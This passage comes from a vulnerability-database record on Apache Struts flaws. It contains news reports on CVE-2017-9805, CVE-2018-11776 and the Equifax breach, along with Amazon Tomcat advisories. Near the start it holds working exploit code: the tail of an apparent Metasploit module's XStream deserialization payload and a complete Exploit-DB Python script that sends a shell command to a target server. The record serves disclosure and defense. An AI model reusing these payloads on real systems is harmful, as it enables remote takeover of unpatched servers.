<jdk.nashorn.internal.objects.NativeString>\n <flags>0</flags>\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n <dataHandler>\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n <is class=\"javax.crypto.CipherInputStream\">\n <cipher class=\"javax.crypto.NullCipher\">\n <initialized>false</initialized>\n <opmode>0</opmode>\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"java.util.Collections$EmptyIterator\"/>\n <next class=\"java.lang.ProcessBuilder\">\n <command>\n <string>#{cmd.join('</string><string>')}</string>\n </command>\n <redirectErrorStream>false</redirectErrorStream>\n </next>\n </iter>\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n <method>\n <class>java.lang.ProcessBuilder</class>\n <name>start</name>\n <parameter-types/>\n </method>\n <name>#{rand_str}</name>\n </filter>\n <next class=\"string\">#{rand_str}</next>\n </serviceIterator>\n <lock/>\n </cipher>\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n <ibuffer></ibuffer>\n <done>false</done>\n <ostart>0</ostart>\n <ofinish>0</ofinish>\n <closed>false</closed>\n </is>\n <consumed>false</consumed>\n </dataSource>\n <transferFlavors/>\n </dataHandler>\n <dataLen>0</dataLen>\n </value>\n </jdk.nashorn.internal.objects.NativeString>\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n <entry>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n</map>\nEOF\n end\n\n def check_response(res)\n res && res.code == 500 && res.body.include?(error_string)\n end\n\n def error_string\n 'java.lang.String cannot be cast to java.security.Provider$Service'\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_rest_xstream.rb"}], "exploitdb": [{"lastseen": "2017-09-07T10:25:56", "bulletinFamily": "exploit", "description": "Apache Struts 2.5 - Remote Code Execution. CVE-2017-9805. Remote exploit for Linux platform", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "EDB-ID:42627", "href": "https://www.exploit-db.com/exploits/42627/", "type": "exploitdb", "title": "Apache Struts 2.5 - Remote Code Execution", "sourceData": "# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE\r\n# Google Dork: filetype:action\r\n# Date: 06/09/2017\r\n# Exploit Author: Warflop\r\n# Vendor Homepage: https://struts.apache.org/\r\n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip\r\n# Version: Struts 2.5 \u00e2\u20ac\u201c Struts 2.5.12\r\n# Tested on: Struts 2.5.10\r\n# CVE : 2017-9805\r\n\r\n#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# Struts CVE-2017-9805 Exploit\r\n# Warflop (http://securityattack.com.br/)\r\n# Greetz: Pimps & G4mbl3r\r\n# *****************************************************\r\nimport requests\r\nimport sys\r\n\r\ndef exploration(command):\r\n\r\n\texploit = '''\r\n\t\t\t\t<map>\r\n\t\t\t\t<entry>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString>\r\n\t\t\t\t<flags>0</flags>\r\n\t\t\t\t<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n\t\t\t\t<dataHandler>\r\n\t\t\t\t<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n\t\t\t\t<is class=\"javax.crypto.CipherInputStream\">\r\n\t\t\t\t<cipher class=\"javax.crypto.NullCipher\">\r\n\t\t\t\t<initialized>false</initialized>\r\n\t\t\t\t<opmode>0</opmode>\r\n\t\t\t\t<serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n\t\t\t\t<iter class=\"javax.imageio.spi.FilterIterator\">\r\n\t\t\t\t<iter class=\"java.util.Collections$EmptyIterator\"/>\r\n\t\t\t\t<next class=\"java.lang.ProcessBuilder\">\r\n\t\t\t\t<command>\r\n\t\t\t\t<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>\r\n\t\t\t\t</command>\r\n\t\t\t\t<redirectErrorStream>false</redirectErrorStream>\r\n\t\t\t\t</next>\r\n\t\t\t\t</iter>\r\n\t\t\t\t<filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n\t\t\t\t<method>\r\n\t\t\t\t<class>java.lang.ProcessBuilder</class>\r\n\t\t\t\t<name>start</name>\r\n\t\t\t\t<parameter-types/>\r\n\t\t\t\t</method>\r\n\t\t\t\t<name>foo</name>\r\n\t\t\t\t</filter>\r\n\t\t\t\t<next class=\"string\">foo</next>\r\n\t\t\t\t</serviceIterator>\r\n\t\t\t\t<lock/>\r\n\t\t\t\t</cipher>\r\n\t\t\t\t<input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n\t\t\t\t<ibuffer/>\r\n\t\t\t\t<done>false</done>\r\n\t\t\t\t<ostart>0</ostart>\r\n\t\t\t\t<ofinish>0</ofinish>\r\n\t\t\t\t<closed>false</closed>\r\n\t\t\t\t</is>\r\n\t\t\t\t<consumed>false</consumed>\r\n\t\t\t\t</dataSource>\r\n\t\t\t\t<transferFlavors/>\r\n\t\t\t\t</dataHandler>\r\n\t\t\t\t<dataLen>0</dataLen>\r\n\t\t\t\t</value>\r\n\t\t\t\t</jdk.nashorn.internal.objects.NativeString>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n\t\t\t\t</entry>\r\n\t\t\t\t<entry>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n\t\t\t\t<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n\t\t\t\t</entry>\r\n\t\t\t\t</map>\r\n\t\t\t\t'''\r\n\r\n\r\n\turl = sys.argv[1]\r\n\r\n\theaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',\r\n\t\t\t'Content-Type': 'application/xml'}\r\n\r\n\trequest = requests.post(url, data=exploit, headers=headers)\r\n\tprint request.text\r\n\r\nif len(sys.argv) < 3:\r\n\tprint ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')\r\n\tprint ('[*] Warflop - http://securityattack.com.br')\r\n\tprint ('[*] Greatz: Pimps & G4mbl3r')\r\n\tprint ('[*] Use: python struts2.py URL COMMAND')\r\n\tprint ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')\r\n\texit(0)\r\nelse:\r\n\texploration(sys.argv[2])", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42627/"}], "thn": [{"lastseen": "2018-01-27T10:06:56", "bulletinFamily": "info", "description": "[![apache-struts-vulnerability](https://3.bp.blogspot.com/-FaVOI33zhVo/Wa7tX3RO_oI/AAAAAAAAuSA/pvKz2qxYH9weyv9C_HBcEOR5P901cjkngCLcBGAs/s1600/apache-struts-vulnerability.png)](<https://3.bp.blogspot.com/-FaVOI33zhVo/Wa7tX3RO_oI/AAAAAAAAuSA/pvKz2qxYH9weyv9C_HBcEOR5P901cjkngCLcBGAs/s1600/apache-struts-vulnerability.png>)\n\nSecurity researchers have [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) a critical remote code execution vulnerability in the popular Apache Struts web application framework, allowing a remote attacker to run malicious code on the affected servers. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for developing web applications in the Java programming language, which supports REST, AJAX, and JSON. \n \nThe vulnerability (CVE-2017-9805) is a programming blunder that resides in the way Struts processes data from an untrusted source. Specifically, Struts REST plugin fails to handle XML payloads while deserializing them properly. \n \nAll versions of Apache Struts since 2008 (Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) are affected, leaving all web applications using the framework\u2019s REST plugin vulnerable to remote attackers. \n \nAccording to one of the security researchers at LGTM, who [discovered](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>) this flaw, the Struts framework is being used by \"an incredibly large number and variety of organisations,\" including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \n\"On top of that, [the vulnerability] is incredibly easy for an attacker to exploit this weakness: all you need is a web browser,\" Man Yue Mo, an LGTM security researcher said. \n \nAll an attacker needs is to submit a malicious XML code in a particular format to trigger the vulnerability on the targeted server. \n \nSuccessful exploitation of the vulnerability could allow an attacker to take full control of the affected server, eventually letting the attacker infiltrate into other systems on the same network. \n \nMo said this flaw is an unsafe deserialization in Java similar to a vulnerability in Apache Commons Collections, [discovered](<https://frohoff.github.io/appseccali-marshalling-pickles/>) by Chris Frohoff and Gabriel Lawrence in 2015 that also allowed arbitrary code execution. \n \nMany Java applications have since been affected by multiple similar vulnerabilities in recent years. \n \nSince this vulnerability has been patched in [Struts version 2.5.13](<https://struts.apache.org/docs/s2-052.html>), administrators are strongly advised to upgrade their Apache Struts installation as soon as possible. \n \nMore technical details about the vulnerability and proof-of-concept have not been published by the researchers yet, giving admins enough time to upgrade their systems.\n", "modified": "2017-09-06T10:53:09", "published": "2017-09-05T07:40:00", "id": "THN:460709FF530ED7F35B5817A55F1BF2C6", "href": "https://thehackernews.com/2017/09/apache-struts-vulnerability.html", "type": "thn", "title": "Critical Flaw in Apache Struts2 Lets Hackers Take Over Web Servers", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "description": "[![equifax-apache-struts](https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png)](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "modified": "2017-09-15T10:00:54", "published": "2017-09-13T21:38:00", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T19:31:29", "bulletinFamily": "info", "description": "[![apache struts vulnerability hacking](https://1.bp.blogspot.com/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png)](<https://1.bp.blogspot.com/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n\n\n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies a wildcard namespace.\nAccording to the researcher, even if an application is currently not vulnerable, \"an inadvertent change to a Struts configuration file may render the application vulnerable in the future.\" \n \n\n\n## Here's Why You Should Take Apache Struts Exploit Seriously\n\n \nLess than a year ago, credit rating agency Equifax exposed [personal details of its 147 million consumers](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) due to their failure of patching a similar [Apache Struts flaw](<https://thehackernews.com/2017/03/apache-struts-framework.html>) that was disclosed earlier that year (CVE-2017-5638). \n\n\n \nThe Equifax breach cost the company over $600 million in losses. \n\n\n> \"Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\" said Pavel Avgustinov, Co-founder & VP of QL Engineering at Semmle.\n\n> \"A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system.\"\n\n \n\n\n## Patch Released for Critical Apache Struts Bug\n\n[![apache struts vulnerability exploit](https://1.bp.blogspot.com/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png)](<https://1.bp.blogspot.com/-aZ6JnELsib4/W31pGhAz6bI/AAAAAAAAx8M/0d3umSPy5YATSc8sNXCx5cKejhIftncEgCLcBGAs/s728-e100/apache-struts-vulnerability-exploit.png>)\n\nApache Struts has fixed the vulnerability with the release of Struts versions 2.3.35 and 2.5.17. Organizations and developers who use Apache Struts are urgently advised to upgrade their Struts components as soon as possible. \n \nWe have seen how previous disclosures of similar critical flaws in Apache Struts have resulted in [PoC exploits](<https://thehackernews.com/2017/03/apache-struts-framework.html>) being published within a day, and exploitation of the [vulnerability in the wild](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>), putting critical infrastructure as well as customers' data at risk. \n \nTherefore, users and administrators are strongly advised to upgrade their Apache Struts components to the latest versions, even if they believe their configuration is not vulnerable right now. \n \nThis is not the first time the Semmle Security Research Team has reported a critical RCE flaw in Apache Struts. Less than a year ago, the team disclosed a similar [remote code execution vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) (CVE-2017-9805) in Apache Struts. \n \n\n\n## UPDATE \u2014 Apache Struts RCE Exploit PoC Released\n\n[![apache struts exploit poc rce vulnerability](https://1.bp.blogspot.com/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png)](<https://1.bp.blogspot.com/-fNjQzu1b7iw/W376YS-nYjI/AAAAAAAAx9I/T7MopN2IxtwTxicu4k8j55ywy0GbIRQHgCLcBGAs/s728-e100/apache-struts-exploit-poc-rce-vulnerability.png>)\n\nA security researcher has today released [a PoC exploit](<https://github.com/jas502n/St2-057/blob/master/README.md>) for the newly discovered remote code execution (RCE) vulnerability (CVE-2018-11776) in Apache Struts web application framework.\n", "modified": "2018-08-23T18:30:56", "published": "2018-08-22T14:04:00", "id": "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "href": "https://thehackernews.com/2018/08/apache-struts-vulnerability.html", "type": "thn", "title": "New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2019-05-29T19:20:37", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nSecurity constrained bypass in error page mechanism: \nA vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. ([CVE-2017-5664 __](<https://access.redhat.com/security/cve/CVE-2017-5664>))\n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-webapps-7.0.78-1.27.amzn1.noarch \n tomcat7-lib-7.0.78-1.27.amzn1.noarch \n tomcat7-javadoc-7.0.78-1.27.amzn1.noarch \n tomcat7-log4j-7.0.78-1.27.amzn1.noarch \n tomcat7-docs-webapp-7.0.78-1.27.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.78-1.27.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.78-1.27.amzn1.noarch \n tomcat7-7.0.78-1.27.amzn1.noarch \n tomcat7-admin-webapps-7.0.78-1.27.amzn1.noarch \n tomcat7-el-2.2-api-7.0.78-1.27.amzn1.noarch \n \n src: \n tomcat7-7.0.78-1.27.amzn1.src \n \n \n", "modified": "2017-07-06T22:52:00", "published": "2017-07-06T22:52:00", "id": "ALAS-2017-853", "href": "https://alas.aws.amazon.com/ALAS-2017-853.html", "title": "Important: tomcat7", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T19:20:47", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nSecurity constrained bypass in error page mechanism: \nA vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. ([CVE-2017-5664 __](<https://access.redhat.com/security/cve/CVE-2017-5664>))\n\n \n**Affected Packages:** \n\n\ntomcat8\n\n \n**Issue Correction:** \nRun _yum update tomcat8_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat8-8.0.44-1.71.amzn1.noarch \n tomcat8-el-3.0-api-8.0.44-1.71.amzn1.noarch \n tomcat8-webapps-8.0.44-1.71.amzn1.noarch \n tomcat8-servlet-3.1-api-8.0.44-1.71.amzn1.noarch \n tomcat8-docs-webapp-8.0.44-1.71.amzn1.noarch \n tomcat8-admin-webapps-8.0.44-1.71.amzn1.noarch \n tomcat8-jsp-2.3-api-8.0.44-1.71.amzn1.noarch \n tomcat8-javadoc-8.0.44-1.71.amzn1.noarch \n tomcat8-log4j-8.0.44-1.71.amzn1.noarch \n tomcat8-lib-8.0.44-1.71.amzn1.noarch \n \n src: \n tomcat8-8.0.44-1.71.amzn1.src \n \n \n", "modified": "2017-07-06T22:53:00", "published": "2017-07-06T22:53:00", "id": "ALAS-2017-854", "href": "https://alas.aws.amazon.com/ALAS-2017-854.html", "title": "Important: tomcat8", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T19:20:37", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nSecurity constrained bypass in error page mechanism: \nA vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. ([CVE-2017-5664 __](<https://access.redhat.com/security/cve/CVE-2017-5664>))\n\nThe CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances. ([CVE-2017-7674 __](<https://access.redhat.com/security/cve/CVE-2017-7674>))\n\n \n**Affected Packages:** \n\n\ntomcat8\n\n \n**Issue Correction:** \nRun _yum update tomcat8_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat8-webapps-8.0.45-1.72.amzn1.noarch \n tomcat8-docs-webapp-8.0.45-1.72.amzn1.noarch \n tomcat8-8.0.45-1.72.amzn1.noarch \n tomcat8-javadoc-8.0.45-1.72.amzn1.noarch \n tomcat8-lib-8.0.45-1.72.amzn1.noarch \n tomcat8-servlet-3.1-api-8.0.45-1.72.amzn1.noarch \n tomcat8-admin-webapps-8.0.45-1.72.amzn1.noarch \n tomcat8-el-3.0-api-8.0.45-1.72.amzn1.noarch \n tomcat8-jsp-2.3-api-8.0.45-1.72.amzn1.noarch \n tomcat8-log4j-8.0.45-1.72.amzn1.noarch \n \n src: \n tomcat8-8.0.45-1.72.amzn1.src \n \n \n", "modified": "2017-08-31T23:17:00", "published": "2017-08-31T23:17:00", "id": "ALAS-2017-862", "href": "https://alas.aws.amazon.com/ALAS-2017-862.html", "title": "Important: tomcat8", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T19:20:28", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nSecurity constrained bypass in error page mechanism: \nWhile investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.([CVE-2017-5664 __](<https://access.redhat.com/security/cve/CVE-2017-5664>) )\n\nCalls to application listeners did not use the appropriate facade object: \nA vulnerability was discovered in tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and thereby access and/or modify information associated with another web application. ([CVE-2017-5648 __](<https://access.redhat.com/security/cve/CVE-2017-5648>))\n\nThe CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.([CVE-2017-7674 __](<https://access.redhat.com/security/cve/CVE-2017-7674>))\n\n \n**Affected Packages:** \n\n\ntomcat7\n\n \n**Issue Correction:** \nRun _yum update tomcat7_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n tomcat7-admin-webapps-7.0.79-1.28.amzn1.noarch \n tomcat7-jsp-2.2-api-7.0.79-1.28.amzn1.noarch \n tomcat7-webapps-7.0.79-1.28.amzn1.noarch \n tomcat7-lib-7.0.79-1.28.amzn1.noarch \n tomcat7-7.0.79-1.28.amzn1.noarch \n tomcat7-el-2.2-api-7.0.79-1.28.amzn1.noarch \n tomcat7-servlet-3.0-api-7.0.79-1.28.amzn1.noarch \n tomcat7-docs-webapp-7.0.79-1.28.amzn1.noarch \n tomcat7-log4j-7.0.79-1.28.amzn1.noarch \n tomcat7-javadoc-7.0.79-1.28.amzn1.noarch \n \n src: \n tomcat7-7.0.79-1.28.amzn1.src \n \n \n", "modified": "2017-08-31T23:16:00", "published": "2017-08-31T23:16:00", "id": "ALAS-2017-873", "href": "https://alas.aws.amazon.com/ALAS-2017-873.html", "title": "Important: tomcat7", "type": "amazon", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "threatpost": [{"lastseen": "2019-06-28T05:48:46", "bulletinFamily": "info", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially 